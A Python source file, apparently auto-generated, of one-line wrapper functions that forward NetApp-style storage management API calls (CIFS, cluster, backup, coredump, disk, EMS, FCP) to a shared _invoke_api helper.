def cifs_character_mapping_get_iter(*args):
api_call = _invoke_api('cifs-character-mapping-get-iter', *args)
return api_call
def cifs_domain_discovered_servers_get_iter(*args):
api_call = _invoke_api('cifs-domain-discovered-servers-get-iter', *args)
return api_call
def cifs_domain_name_mapping_search_get_iter(*args):
api_call = _invoke_api('cifs-domain-name-mapping-search-get-iter', *args)
return api_call
def cifs_domain_password_schedule_get_iter(*args):
api_call = _invoke_api('cifs-domain-password-schedule-get-iter', *args)
return api_call
def cifs_domain_preferred_dc_get_iter(*args):
api_call = _invoke_api('cifs-domain-preferred-dc-get-iter', *args)
return api_call
def cifs_domain_trusts_get_iter(*args):
api_call = _invoke_api('cifs-domain-trusts-get-iter', *args)
return api_call
def cifs_home_directory_get_iter(*args):
api_call = _invoke_api('cifs-home-directory-get-iter', *args)
return api_call
def cifs_home_directory_search_path_get_iter(*args):
api_call = _invoke_api('cifs-home-directory-search-path-get-iter', *args)
return api_call
def cifs_local_group_get_iter(*args):
api_call = _invoke_api('cifs-local-group-get-iter', *args)
return api_call
def cifs_local_group_members_get_iter(*args):
api_call = _invoke_api('cifs-local-group-members-get-iter', *args)
return api_call
def cifs_local_user_get_iter(*args):
api_call = _invoke_api('cifs-local-user-get-iter', *args)
return api_call
def cifs_local_user_membership_get_iter(*args):
api_call = _invoke_api('cifs-local-user-membership-get-iter', *args)
return api_call
def cifs_nbtstat_get_iter(*args):
api_call = _invoke_api('cifs-nbtstat-get-iter', *args)
return api_call
def cifs_options_get_iter(*args):
api_call = _invoke_api('cifs-options-get-iter', *args)
return api_call
def cifs_privilege_get_iter(*args):
api_call = _invoke_api('cifs-privilege-get-iter', *args)
return api_call
def cifs_security_get_iter(*args):
api_call = _invoke_api('cifs-security-get-iter', *args)
return api_call
def cifs_server_get_iter(*args):
api_call = _invoke_api('cifs-server-get-iter', *args)
return api_call
def cifs_session_file_get_iter(*args):
api_call = _invoke_api('cifs-session-file-get-iter', *args)
return api_call
def cifs_session_get_iter(*args):
api_call = _invoke_api('cifs-session-get-iter', *args)
return api_call
def cifs_shadowcopy_add_files(*args):
api_call = _invoke_api('cifs-shadowcopy-add-files', *args)
return api_call
def cifs_shadowcopy_ems_get_iter(*args):
api_call = _invoke_api('cifs-shadowcopy-ems-get-iter', *args)
return api_call
def cifs_shadowcopy_keep_snapshot(*args):
api_call = _invoke_api('cifs-shadowcopy-keep-snapshot', *args)
return api_call
def cifs_shadowcopy_restore_dir(*args):
api_call = _invoke_api('cifs-shadowcopy-restore-dir', *args)
return api_call
def cifs_share_access_control_get_iter(*args):
api_call = _invoke_api('cifs-share-access-control-get-iter', *args)
return api_call
def cifs_share_get_iter(*args):
api_call = _invoke_api('cifs-share-get-iter', *args)
return api_call
def cifs_symlink_get_iter(*args):
api_call = _invoke_api('cifs-symlink-get-iter', *args)
return api_call
def clock_get_clock(*args):
api_call = _invoke_api('clock-get-clock', *args)
return api_call
def clock_get_timezone(*args):
api_call = _invoke_api('clock-get-timezone', *args)
return api_call
def clone_deletion_get_iter(*args):
api_call = _invoke_api('clone-deletion-get-iter', *args)
return api_call
def clone_split_load_get_iter(*args):
api_call = _invoke_api('clone-split-load-get-iter', *args)
return api_call
def clone_split_load_modify(*args):
api_call = _invoke_api('clone-split-load-modify', *args)
return api_call
def clone_token_create(*args):
api_call = _invoke_api('clone-token-create', *args)
return api_call
def clone_token_delete(*args):
api_call = _invoke_api('clone-token-delete', *args)
return api_call
def clone_token_get(*args):
api_call = _invoke_api('clone-token-get', *args)
return api_call
def clone_token_modify_expiry_limit(*args):
api_call = _invoke_api('clone-token-modify-expiry-limit', *args)
return api_call
def cluster_application_record_create(*args):
api_call = _invoke_api('cluster-application-record-create', *args)
return api_call
def cluster_application_record_delete(*args):
api_call = _invoke_api('cluster-application-record-delete', *args)
return api_call
def cluster_application_record_get_iter(*args):
api_call = _invoke_api('cluster-application-record-get-iter', *args)
return api_call
def cluster_application_record_modify(*args):
api_call = _invoke_api('cluster-application-record-modify', *args)
return api_call
def cluster_contact_get(*args):
api_call = _invoke_api('cluster-contact-get', *args)
return api_call
def cluster_contact_modify(*args):
api_call = _invoke_api('cluster-contact-modify', *args)
return api_call
def cluster_create(*args):
api_call = _invoke_api('cluster-create', *args)
return api_call
def cluster_create_join_progress_get(*args):
api_call = _invoke_api('cluster-create-join-progress-get', *args)
return api_call
def cluster_ha_get(*args):
api_call = _invoke_api('cluster-ha-get', *args)
return api_call
def cluster_ha_modify(*args):
api_call = _invoke_api('cluster-ha-modify', *args)
return api_call
def cluster_identity_get(*args):
api_call = _invoke_api('cluster-identity-get', *args)
return api_call
def cluster_identity_modify(*args):
api_call = _invoke_api('cluster-identity-modify', *args)
return api_call
def cluster_image_get(*args):
api_call = _invoke_api('cluster-image-get', *args)
return api_call
def cluster_image_get_download_progress(*args):
api_call = _invoke_api('cluster-image-get-download-progress', *args)
return api_call
def cluster_image_get_iter(*args):
api_call = _invoke_api('cluster-image-get-iter', *args)
return api_call
def cluster_image_node_update_progress_info(*args):
api_call = _invoke_api('cluster-image-node-update-progress-info', *args)
return api_call
def cluster_image_package_delete(*args):
api_call = _invoke_api('cluster-image-package-delete', *args)
return api_call
def cluster_image_package_download(*args):
api_call = _invoke_api('cluster-image-package-download', *args)
return api_call
def cluster_image_package_download_abort(*args):
api_call = _invoke_api('cluster-image-package-download-abort', *args)
return api_call
def cluster_image_package_local_get(*args):
api_call = _invoke_api('cluster-image-package-local-get', *args)
return api_call
def cluster_image_package_local_get_iter(*args):
api_call = _invoke_api('cluster-image-package-local-get-iter', *args)
return api_call
def cluster_image_update(*args):
api_call = _invoke_api('cluster-image-update', *args)
return api_call
def cluster_image_update_cancel(*args):
api_call = _invoke_api('cluster-image-update-cancel', *args)
return api_call
def cluster_image_update_history_get_iter(*args):
api_call = _invoke_api('cluster-image-update-history-get-iter', *args)
return api_call
def cluster_image_update_log_get_iter(*args):
api_call = _invoke_api('cluster-image-update-log-get-iter', *args)
return api_call
def cluster_image_update_pause(*args):
api_call = _invoke_api('cluster-image-update-pause', *args)
return api_call
def cluster_image_update_progress_get_iter(*args):
api_call = _invoke_api('cluster-image-update-progress-get-iter', *args)
return api_call
def cluster_image_update_progress_info(*args):
api_call = _invoke_api('cluster-image-update-progress-info', *args)
return api_call
def cluster_image_update_resume(*args):
api_call = _invoke_api('cluster-image-update-resume', *args)
return api_call
def cluster_image_validate(*args):
api_call = _invoke_api('cluster-image-validate', *args)
return api_call
def cluster_join(*args):
api_call = _invoke_api('cluster-join', *args)
return api_call
def cluster_log_forward_create(*args):
api_call = _invoke_api('cluster-log-forward-create', *args)
return api_call
def cluster_log_forward_destroy(*args):
api_call = _invoke_api('cluster-log-forward-destroy', *args)
return api_call
def cluster_log_forward_get(*args):
api_call = _invoke_api('cluster-log-forward-get', *args)
return api_call
def cluster_log_forward_get_iter(*args):
api_call = _invoke_api('cluster-log-forward-get-iter', *args)
return api_call
def cluster_log_forward_modify(*args):
api_call = _invoke_api('cluster-log-forward-modify', *args)
return api_call
def cluster_log_forward_statistics_get(*args):
api_call = _invoke_api('cluster-log-forward-statistics-get', *args)
return api_call
def cluster_log_forward_statistics_get_iter(*args):
api_call = _invoke_api('cluster-log-forward-statistics-get-iter', *args)
return api_call
def cluster_node_get(*args):
api_call = _invoke_api('cluster-node-get', *args)
return api_call
def cluster_node_get_iter(*args):
api_call = _invoke_api('cluster-node-get-iter', *args)
return api_call
def cluster_node_modify(*args):
api_call = _invoke_api('cluster-node-modify', *args)
return api_call
def cluster_peer_active_address_insert(*args):
api_call = _invoke_api('cluster-peer-active-address-insert', *args)
return api_call
def cluster_peer_active_addresses_get(*args):
api_call = _invoke_api('cluster-peer-active-addresses-get', *args)
return api_call
def cluster_peer_active_addresses_register(*args):
api_call = _invoke_api('cluster-peer-active-addresses-register', *args)
return api_call
def cluster_peer_authn_offer_cancel(*args):
api_call = _invoke_api('cluster-peer-authn-offer-cancel', *args)
return api_call
def cluster_peer_authn_offer_get(*args):
api_call = _invoke_api('cluster-peer-authn-offer-get', *args)
return api_call
def cluster_peer_authn_offer_get_iter(*args):
api_call = _invoke_api('cluster-peer-authn-offer-get-iter', *args)
return api_call
def cluster_peer_authn_offer_modify(*args):
api_call = _invoke_api('cluster-peer-authn-offer-modify', *args)
return api_call
def cluster_peer_connection_destroy(*args):
api_call = _invoke_api('cluster-peer-connection-destroy', *args)
return api_call
def cluster_peer_connections_get(*args):
api_call = _invoke_api('cluster-peer-connections-get', *args)
return api_call
def cluster_peer_connections_get_iter(*args):
api_call = _invoke_api('cluster-peer-connections-get-iter', *args)
return api_call
def cluster_peer_create(*args):
api_call = _invoke_api('cluster-peer-create', *args)
return api_call
def cluster_peer_delete(*args):
api_call = _invoke_api('cluster-peer-delete', *args)
return api_call
def cluster_peer_get(*args):
api_call = _invoke_api('cluster-peer-get', *args)
return api_call
def cluster_peer_get_iter(*args):
api_call = _invoke_api('cluster-peer-get-iter', *args)
return api_call
def cluster_peer_health_info_get(*args):
api_call = _invoke_api('cluster-peer-health-info-get', *args)
return api_call
def cluster_peer_health_info_get_iter(*args):
api_call = _invoke_api('cluster-peer-health-info-get-iter', *args)
return api_call
def cluster_peer_modify(*args):
api_call = _invoke_api('cluster-peer-modify', *args)
return api_call
def cluster_peer_ping_cluster_peer_test_check_mtu(*args):
api_call = _invoke_api('cluster-peer-ping-cluster-peer-test-check-mtu', *args)
return api_call
def cluster_peer_ping_iter(*args):
api_call = _invoke_api('cluster-peer-ping-iter', *args)
return api_call
def cluster_peer_policy_get(*args):
api_call = _invoke_api('cluster-peer-policy-get', *args)
return api_call
def cluster_peer_policy_modify(*args):
api_call = _invoke_api('cluster-peer-policy-modify', *args)
return api_call
def cluster_peer_stable_addresses_get(*args):
api_call = _invoke_api('cluster-peer-stable-addresses-get', *args)
return api_call
def cluster_peer_stable_addresses_register(*args):
api_call = _invoke_api('cluster-peer-stable-addresses-register', *args)
return api_call
def cluster_unjoin(*args):
api_call = _invoke_api('cluster-unjoin', *args)
return api_call
def config_backup_copy(*args):
api_call = _invoke_api('config-backup-copy', *args)
return api_call
def config_backup_create(*args):
api_call = _invoke_api('config-backup-create', *args)
return api_call
def config_backup_delete(*args):
api_call = _invoke_api('config-backup-delete', *args)
return api_call
def config_backup_download(*args):
api_call = _invoke_api('config-backup-download', *args)
return api_call
def config_backup_info_get(*args):
api_call = _invoke_api('config-backup-info-get', *args)
return api_call
def config_backup_info_get_iter(*args):
api_call = _invoke_api('config-backup-info-get-iter', *args)
return api_call
def config_backup_rename(*args):
api_call = _invoke_api('config-backup-rename', *args)
return api_call
def config_backup_settings_get(*args):
api_call = _invoke_api('config-backup-settings-get', *args)
return api_call
def config_backup_settings_modify(*args):
api_call = _invoke_api('config-backup-settings-modify', *args)
return api_call
def config_backup_settings_password_set(*args):
api_call = _invoke_api('config-backup-settings-password-set', *args)
return api_call
def config_backup_upload(*args):
api_call = _invoke_api('config-backup-upload', *args)
return api_call
def core_segment_config_get(*args):
api_call = _invoke_api('core-segment-config-get', *args)
return api_call
def core_segment_config_modify(*args):
api_call = _invoke_api('core-segment-config-modify', *args)
return api_call
def core_segment_delete_all(*args):
api_call = _invoke_api('core-segment-delete-all', *args)
return api_call
def core_segment_destroy(*args):
api_call = _invoke_api('core-segment-destroy', *args)
return api_call
def core_segment_get(*args):
api_call = _invoke_api('core-segment-get', *args)
return api_call
def core_segment_get_iter(*args):
api_call = _invoke_api('core-segment-get-iter', *args)
return api_call
def core_segment_start(*args):
api_call = _invoke_api('core-segment-start', *args)
return api_call
def core_segment_status_get_iter(*args):
api_call = _invoke_api('core-segment-status-get-iter', *args)
return api_call
def core_segment_stop(*args):
api_call = _invoke_api('core-segment-stop', *args)
return api_call
def coredump_config_get(*args):
api_call = _invoke_api('coredump-config-get', *args)
return api_call
def coredump_config_get_iter(*args):
api_call = _invoke_api('coredump-config-get-iter', *args)
return api_call
def coredump_config_get_total_records(*args):
api_call = _invoke_api('coredump-config-get-total-records', *args)
return api_call
def coredump_config_modify(*args):
api_call = _invoke_api('coredump-config-modify', *args)
return api_call
def coredump_config_modify_iter(*args):
api_call = _invoke_api('coredump-config-modify-iter', *args)
return api_call
def coredump_delete_all(*args):
api_call = _invoke_api('coredump-delete-all', *args)
return api_call
def coredump_delete_core(*args):
api_call = _invoke_api('coredump-delete-core', *args)
return api_call
def coredump_delete_core_iter(*args):
api_call = _invoke_api('coredump-delete-core-iter', *args)
return api_call
def coredump_get(*args):
api_call = _invoke_api('coredump-get', *args)
return api_call
def coredump_get_iter(*args):
api_call = _invoke_api('coredump-get-iter', *args)
return api_call
def coredump_get_total_records(*args):
api_call = _invoke_api('coredump-get-total-records', *args)
return api_call
def coredump_save_all(*args):
api_call = _invoke_api('coredump-save-all', *args)
return api_call
def coredump_save_core(*args):
api_call = _invoke_api('coredump-save-core', *args)
return api_call
def coredump_save_core_iter(*args):
api_call = _invoke_api('coredump-save-core-iter', *args)
return api_call
def coredump_trigger(*args):
api_call = _invoke_api('coredump-trigger', *args)
return api_call
def coredump_upload_core(*args):
api_call = _invoke_api('coredump-upload-core', *args)
return api_call
def cost_center_statistics_get(*args):
api_call = _invoke_api('cost-center-statistics-get', *args)
return api_call
def cost_center_statistics_get_iter(*args):
api_call = _invoke_api('cost-center-statistics-get-iter', *args)
return api_call
def cost_center_statistics_get_total_records(*args):
api_call = _invoke_api('cost-center-statistics-get-total-records', *args)
return api_call
def dashboard_alarm_get(*args):
api_call = _invoke_api('dashboard-alarm-get', *args)
return api_call
def dashboard_alarm_get_iter(*args):
api_call = _invoke_api('dashboard-alarm-get-iter', *args)
return api_call
def dashboard_alarm_get_total_records(*args):
api_call = _invoke_api('dashboard-alarm-get-total-records', *args)
return api_call
def dashboard_alarm_threshold_get(*args):
api_call = _invoke_api('dashboard-alarm-threshold-get', *args)
return api_call
def dashboard_alarm_threshold_get_iter(*args):
api_call = _invoke_api('dashboard-alarm-threshold-get-iter', *args)
return api_call
def dashboard_alarm_threshold_get_total_records(*args):
api_call = _invoke_api('dashboard-alarm-threshold-get-total-records', *args)
return api_call
def dashboard_alarm_threshold_modify(*args):
api_call = _invoke_api('dashboard-alarm-threshold-modify', *args)
return api_call
def default_destroy_iter(*args):
api_call = _invoke_api('default-destroy-iter', *args)
return api_call
def default_destroy_iter_inout(*args):
api_call = _invoke_api('default-destroy-iter-inout', *args)
return api_call
def default_get(*args):
api_call = _invoke_api('default-get', *args)
return api_call
def default_get_inout(*args):
api_call = _invoke_api('default-get-inout', *args)
return api_call
def default_get_iter(*args):
api_call = _invoke_api('default-get-iter', *args)
return api_call
def default_get_iter_inout(*args):
api_call = _invoke_api('default-get-iter-inout', *args)
return api_call
def default_modify_iter(*args):
api_call = _invoke_api('default-modify-iter', *args)
return api_call
def default_modify_iter_inout(*args):
api_call = _invoke_api('default-modify-iter-inout', *args)
return api_call
def diagnosis_alert_definition_get(*args):
api_call = _invoke_api('diagnosis-alert-definition-get', *args)
return api_call
def diagnosis_alert_definition_get_iter(*args):
api_call = _invoke_api('diagnosis-alert-definition-get-iter', *args)
return api_call
def diagnosis_alert_get(*args):
api_call = _invoke_api('diagnosis-alert-get', *args)
return api_call
def diagnosis_alert_get_iter(*args):
api_call = _invoke_api('diagnosis-alert-get-iter', *args)
return api_call
def diagnosis_alert_modify(*args):
api_call = _invoke_api('diagnosis-alert-modify', *args)
return api_call
def diagnosis_config_get(*args):
api_call = _invoke_api('diagnosis-config-get', *args)
return api_call
def diagnosis_config_get_iter(*args):
api_call = _invoke_api('diagnosis-config-get-iter', *args)
return api_call
def diagnosis_delete_alert(*args):
api_call = _invoke_api('diagnosis-delete-alert', *args)
return api_call
def diagnosis_policy_definition_get(*args):
api_call = _invoke_api('diagnosis-policy-definition-get', *args)
return api_call
def diagnosis_policy_definition_get_iter(*args):
api_call = _invoke_api('diagnosis-policy-definition-get-iter', *args)
return api_call
def diagnosis_policy_modify(*args):
api_call = _invoke_api('diagnosis-policy-modify', *args)
return api_call
def diagnosis_status_get(*args):
api_call = _invoke_api('diagnosis-status-get', *args)
return api_call
def diagnosis_subscriptions_create(*args):
api_call = _invoke_api('diagnosis-subscriptions-create', *args)
return api_call
def diagnosis_subscriptions_get(*args):
api_call = _invoke_api('diagnosis-subscriptions-get', *args)
return api_call
def diagnosis_subscriptions_get_iter(*args):
api_call = _invoke_api('diagnosis-subscriptions-get-iter', *args)
return api_call
def diagnosis_subscriptions_modify(*args):
api_call = _invoke_api('diagnosis-subscriptions-modify', *args)
return api_call
def diagnosis_subsystem_config_get(*args):
api_call = _invoke_api('diagnosis-subsystem-config-get', *args)
return api_call
def diagnosis_subsystem_config_get_iter(*args):
api_call = _invoke_api('diagnosis-subsystem-config-get-iter', *args)
return api_call
def diagnosis_subsystem_config_modify(*args):
api_call = _invoke_api('diagnosis-subsystem-config-modify', *args)
return api_call
def disk_encrypt_get(*args):
api_call = _invoke_api('disk-encrypt-get', *args)
return api_call
def disk_encrypt_get_iter(*args):
api_call = _invoke_api('disk-encrypt-get-iter', *args)
return api_call
def disk_encrypt_modify(*args):
api_call = _invoke_api('disk-encrypt-modify', *args)
return api_call
def disk_encrypt_modify_iter(*args):
api_call = _invoke_api('disk-encrypt-modify-iter', *args)
return api_call
def disk_encrypt_sanitize(*args):
api_call = _invoke_api('disk-encrypt-sanitize', *args)
return api_call
def disk_encrypt_sanitize_iter(*args):
api_call = _invoke_api('disk-encrypt-sanitize-iter', *args)
return api_call
def disk_encrypt_status_get(*args):
api_call = _invoke_api('disk-encrypt-status-get', *args)
return api_call
def disk_encrypt_status_get_iter(*args):
api_call = _invoke_api('disk-encrypt-status-get-iter', *args)
return api_call
def disk_fail(*args):
api_call = _invoke_api('disk-fail', *args)
return api_call
def disk_remove(*args):
api_call = _invoke_api('disk-remove', *args)
return api_call
def disk_sanown_assign(*args):
api_call = _invoke_api('disk-sanown-assign', *args)
return api_call
def disk_sanown_filer_list_info(*args):
api_call = _invoke_api('disk-sanown-filer-list-info', *args)
return api_call
def disk_sanown_list_info(*args):
api_call = _invoke_api('disk-sanown-list-info', *args)
return api_call
def disk_sanown_reassign(*args):
api_call = _invoke_api('disk-sanown-reassign', *args)
return api_call
def disk_sanown_remove_ownership(*args):
api_call = _invoke_api('disk-sanown-remove-ownership', *args)
return api_call
def disk_unfail(*args):
api_call = _invoke_api('disk-unfail', *args)
return api_call
def disk_update_disk_fw(*args):
api_call = _invoke_api('disk-update-disk-fw', *args)
return api_call
def disk_zero_spares(*args):
api_call = _invoke_api('disk-zero-spares', *args)
return api_call
def dummy_addquery_alt_get(*args):
api_call = _invoke_api('dummy-addquery-alt-get', *args)
return api_call
def dummy_addquery_create(*args):
api_call = _invoke_api('dummy-addquery-create', *args)
return api_call
def dummy_addquery_get_iter(*args):
api_call = _invoke_api('dummy-addquery-get-iter', *args)
return api_call
def dummy_addquery_modify(*args):
api_call = _invoke_api('dummy-addquery-modify', *args)
return api_call
def dummy_async_volume_create(*args):
api_call = _invoke_api('dummy-async-volume-create', *args)
return api_call
def dummy_async_volume_create_args(*args):
api_call = _invoke_api('dummy-async-volume-create-args', *args)
return api_call
def dummy_av_get_engine_options(*args):
api_call = _invoke_api('dummy-av-get-engine-options', *args)
return api_call
def dummy_av_set_engine_options(*args):
api_call = _invoke_api('dummy-av-set-engine-options', *args)
return api_call
def dummy_fcp_create(*args):
api_call = _invoke_api('dummy-fcp-create', *args)
return api_call
def dummy_fcp_destroy(*args):
api_call = _invoke_api('dummy-fcp-destroy', *args)
return api_call
def dummy_fcp_get_iter(*args):
api_call = _invoke_api('dummy-fcp-get-iter', *args)
return api_call
def dummy_file_dummy_read_file(*args):
api_call = _invoke_api('dummy-file-dummy-read-file', *args)
return api_call
def dummy_listInfo_only_get(*args):
api_call = _invoke_api('dummy-listInfo-only-get', *args)
return api_call
def dummy_listInfo_only_list_info(*args):
api_call = _invoke_api('dummy-listInfo-only-list-info', *args)
return api_call
def dummy_quota_create(*args):
api_call = _invoke_api('dummy-quota-create', *args)
return api_call
def dummy_quota_destroy(*args):
api_call = _invoke_api('dummy-quota-destroy', *args)
return api_call
def dummy_quota_report(*args):
api_call = _invoke_api('dummy-quota-report', *args)
return api_call
def dummy_quota_report_no_input(*args):
api_call = _invoke_api('dummy-quota-report-no-input', *args)
return api_call
def dummy_storage_initiator_errors_list_info(*args):
api_call = _invoke_api('dummy-storage-initiator-errors-list-info', *args)
return api_call
def dummy_storage_initiator_errors_list_info_alt(*args):
api_call = _invoke_api('dummy-storage-initiator-errors-list-info-alt', *args)
return api_call
def dummy_storage_initiator_errors_list_info_empty(*args):
api_call = _invoke_api('dummy-storage-initiator-errors-list-info-empty', *args)
return api_call
def dummy_vserver_destroy_iter(*args):
api_call = _invoke_api('dummy-vserver-destroy-iter', *args)
return api_call
def dummy_vserver_dosomething(*args):
api_call = _invoke_api('dummy-vserver-dosomething', *args)
return api_call
def dummy_vserver_family_test_alt_create(*args):
api_call = _invoke_api('dummy-vserver-family-test-alt-create', *args)
return api_call
def dummy_vserver_family_test_alt_destroy(*args):
api_call = _invoke_api('dummy-vserver-family-test-alt-destroy', *args)
return api_call
def dummy_vserver_family_test_alt_get(*args):
api_call = _invoke_api('dummy-vserver-family-test-alt-get', *args)
return api_call
def dummy_vserver_family_test_alt_list_info(*args):
api_call = _invoke_api('dummy-vserver-family-test-alt-list-info', *args)
return api_call
def dummy_vserver_family_test_alt_modify(*args):
api_call = _invoke_api('dummy-vserver-family-test-alt-modify', *args)
return api_call
def dummy_vserver_family_test_destroy_iter(*args):
api_call = _invoke_api('dummy-vserver-family-test-destroy-iter', *args)
return api_call
def dummy_vserver_family_test_get_iter(*args):
api_call = _invoke_api('dummy-vserver-family-test-get-iter', *args)
return api_call
def dummy_vserver_family_test_list_info(*args):
api_call = _invoke_api('dummy-vserver-family-test-list-info', *args)
return api_call
def dummy_vserver_family_test_modify_iter(*args):
api_call = _invoke_api('dummy-vserver-family-test-modify-iter', *args)
return api_call
def dummy_vserver_fcp_list_get_iter(*args):
api_call = _invoke_api('dummy-vserver-fcp-list-get-iter', *args)
return api_call
def dummy_vserver_file_dummy_vserver_read_file_alt(*args):
api_call = _invoke_api('dummy-vserver-file-dummy-vserver-read-file-alt', *args)
return api_call
def dummy_vserver_get_iter(*args):
api_call = _invoke_api('dummy-vserver-get-iter', *args)
return api_call
def dummy_vserver_list_info(*args):
api_call = _invoke_api('dummy-vserver-list-info', *args)
return api_call
def dummy_vserver_list_info_1_alt(*args):
api_call = _invoke_api('dummy-vserver-list-info-1-alt', *args)
return api_call
def dummy_vserver_list_info_2_alt(*args):
api_call = _invoke_api('dummy-vserver-list-info-2-alt', *args)
return api_call
def dummy_vserver_list_info_3_alt(*args):
api_call = _invoke_api('dummy-vserver-list-info-3-alt', *args)
return api_call
def dummy_vserver_list_info_alt(*args):
api_call = _invoke_api('dummy-vserver-list-info-alt', *args)
return api_call
def dummy_vserver_modify_iter(*args):
api_call = _invoke_api('dummy-vserver-modify-iter', *args)
return api_call
def dummy_zapi_delete_async(*args):
api_call = _invoke_api('dummy-zapi-delete-async', *args)
return api_call
def dummy_zapi_delete_async_nowait(*args):
api_call = _invoke_api('dummy-zapi-delete-async-nowait', *args)
return api_call
def dummy_zapi_delete_async_nowait_returnsok(*args):
api_call = _invoke_api('dummy-zapi-delete-async-nowait-returnsok', *args)
return api_call
def dummy_zapi_jobid_async(*args):
api_call = _invoke_api('dummy-zapi-jobid-async', *args)
return api_call
def dummy_zapi_jobid_async_nowait(*args):
api_call = _invoke_api('dummy-zapi-jobid-async-nowait', *args)
return api_call
def dummy_zapi_key_attribute_specified_type(*args):
api_call = _invoke_api('dummy-zapi-key-attribute-specified-type', *args)
return api_call
def dummylun_create(*args):
api_call = _invoke_api('dummylun-create', *args)
return api_call
def dummylun_create_by_size(*args):
api_call = _invoke_api('dummylun-create-by-size', *args)
return api_call
def dummylun_create_by_size_alt(*args):
api_call = _invoke_api('dummylun-create-by-size-alt', *args)
return api_call
def dummylun_destroy_iter(*args):
api_call = _invoke_api('dummylun-destroy-iter', *args)
return api_call
def dummylun_get_alt(*args):
api_call = _invoke_api('dummylun-get-alt', *args)
return api_call
def dummylun_get_iter(*args):
api_call = _invoke_api('dummylun-get-iter', *args)
return api_call
def dummylun_get_iter_alt(*args):
api_call = _invoke_api('dummylun-get-iter-alt', *args)
return api_call
def dummylun_list_info(*args):
api_call = _invoke_api('dummylun-list-info', *args)
return api_call
def dummylun_list_info_alt(*args):
api_call = _invoke_api('dummylun-list-info-alt', *args)
return api_call
def dummylun_list_info_alt1(*args):
api_call = _invoke_api('dummylun-list-info-alt1', *args)
return api_call
def dummylun_list_info_alt2(*args):
api_call = _invoke_api('dummylun-list-info-alt2', *args)
return api_call
def ems_config_get(*args):
api_call = _invoke_api('ems-config-get', *args)
return api_call
def ems_config_modify(*args):
api_call = _invoke_api('ems-config-modify', *args)
return api_call
def ems_destination_create(*args):
api_call = _invoke_api('ems-destination-create', *args)
return api_call
def ems_destination_destroy(*args):
api_call = _invoke_api('ems-destination-destroy', *args)
return api_call
def ems_destination_destroy_iter(*args):
api_call = _invoke_api('ems-destination-destroy-iter', *args)
return api_call
def ems_destination_get(*args):
api_call = _invoke_api('ems-destination-get', *args)
return api_call
def ems_destination_get_iter(*args):
api_call = _invoke_api('ems-destination-get-iter', *args)
return api_call
def ems_destination_modify(*args):
api_call = _invoke_api('ems-destination-modify', *args)
return api_call
def ems_destination_modify_iter(*args):
api_call = _invoke_api('ems-destination-modify-iter', *args)
return api_call
def ems_mail_history_destroy(*args):
api_call = _invoke_api('ems-mail-history-destroy', *args)
return api_call
def ems_mail_history_destroy_iter(*args):
api_call = _invoke_api('ems-mail-history-destroy-iter', *args)
return api_call
def ems_mail_history_get(*args):
api_call = _invoke_api('ems-mail-history-get', *args)
return api_call
def ems_mail_history_get_iter(*args):
api_call = _invoke_api('ems-mail-history-get-iter', *args)
return api_call
def ems_message_get(*args):
api_call = _invoke_api('ems-message-get', *args)
return api_call
def ems_message_get_iter(*args):
api_call = _invoke_api('ems-message-get-iter', *args)
return api_call
def ems_routing_add_destination(*args):
api_call = _invoke_api('ems-routing-add-destination', *args)
return api_call
def ems_routing_get(*args):
api_call = _invoke_api('ems-routing-get', *args)
return api_call
def ems_routing_get_iter(*args):
api_call = _invoke_api('ems-routing-get-iter', *args)
return api_call
def ems_routing_modify(*args):
api_call = _invoke_api('ems-routing-modify', *args)
return api_call
def ems_routing_modify_iter(*args):
api_call = _invoke_api('ems-routing-modify-iter', *args)
return api_call
def ems_routing_remove_destination(*args):
api_call = _invoke_api('ems-routing-remove-destination', *args)
return api_call
def ems_snmp_history_destroy(*args):
api_call = _invoke_api('ems-snmp-history-destroy', *args)
return api_call
def ems_snmp_history_destroy_iter(*args):
api_call = _invoke_api('ems-snmp-history-destroy-iter', *args)
return api_call
def ems_snmp_history_get(*args):
api_call = _invoke_api('ems-snmp-history-get', *args)
return api_call
def ems_snmp_history_get_iter(*args):
api_call = _invoke_api('ems-snmp-history-get-iter', *args)
return api_call
def ems_status_get(*args):
api_call = _invoke_api('ems-status-get', *args)
return api_call
def ems_status_get_iter(*args):
api_call = _invoke_api('ems-status-get-iter', *args)
return api_call
def environment_sensors_get_iter(*args):
api_call = _invoke_api('environment-sensors-get-iter', *args)
return api_call
def event_log_get_iter(*args):
api_call = _invoke_api('event-log-get-iter', *args)
return api_call
def export_policy_get_iter(*args):
api_call = _invoke_api('export-policy-get-iter', *args)
return api_call
def export_rule_get_create_defaults(*args):
api_call = _invoke_api('export-rule-get-create-defaults', *args)
return api_call
def export_rule_get_iter(*args):
api_call = _invoke_api('export-rule-get-iter', *args)
return api_call
def exports_access_cache_all_vservers_get(*args):
api_call = _invoke_api('exports-access-cache-all-vservers-get', *args)
return api_call
def exports_access_cache_all_vservers_modify(*args):
api_call = _invoke_api('exports-access-cache-all-vservers-modify', *args)
return api_call
def external_cache_policy_get(*args):
api_call = _invoke_api('external-cache-policy-get', *args)
return api_call
def external_cache_policy_get_iter(*args):
api_call = _invoke_api('external-cache-policy-get-iter', *args)
return api_call
def external_cache_policy_modify(*args):
api_call = _invoke_api('external-cache-policy-modify', *args)
return api_call
def external_cache_policy_modify_iter(*args):
api_call = _invoke_api('external-cache-policy-modify-iter', *args)
return api_call
def fc_config_adapter_disable(*args):
api_call = _invoke_api('fc-config-adapter-disable', *args)
return api_call
def fc_config_adapter_enable(*args):
api_call = _invoke_api('fc-config-adapter-enable', *args)
return api_call
def fc_config_list_info(*args):
api_call = _invoke_api('fc-config-list-info', *args)
return api_call
def fc_config_set_adapter_fc_type(*args):
api_call = _invoke_api('fc-config-set-adapter-fc-type', *args)
return api_call
def fcp_adapter_config_down(*args):
api_call = _invoke_api('fcp-adapter-config-down', *args)
return api_call
def fcp_adapter_config_up(*args):
api_call = _invoke_api('fcp-adapter-config-up', *args)
return api_call
def fcp_adapter_get_iter(*args):
api_call = _invoke_api('fcp-adapter-get-iter', *args)
return api_call
def fcp_adapter_set_speed(*args):
api_call = _invoke_api('fcp-adapter-set-speed', *args)
return api_call
def fcp_adapter_stats_get_iter(*args):
api_call = _invoke_api('fcp-adapter-stats-get-iter', *args)
return api_call
def fcp_initiator_get_iter(*args):
api_call = _invoke_api('fcp-initiator-get-iter', *args)
return api_call
def fcp_interface_get_iter(*args):
api_call = _invoke_api('fcp-interface-get-iter', *args)
return api_call
def fcp_port_name_get_iter(*args):
api_call = _invoke_api('fcp-port-name-get-iter', *args)
return api_call
def fcp_service_get_iter(*args):
api_call = _invoke_api('fcp-service-get-iter', *args)
return api_call
def fcp_wwpnalias_get_iter(*args):
api_call = _invoke_api('fcp-wwpnalias-get-iter', *args)
